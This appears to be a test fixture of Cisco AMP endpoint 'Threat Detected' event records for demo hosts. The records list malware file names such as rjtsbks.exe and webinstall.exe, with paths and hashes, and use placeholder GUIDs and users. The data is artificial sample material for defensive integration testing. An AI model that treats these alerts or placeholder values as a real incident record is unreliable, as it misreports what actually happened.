+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":209000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"175.16.199.1","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"175.16.199.1","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}}
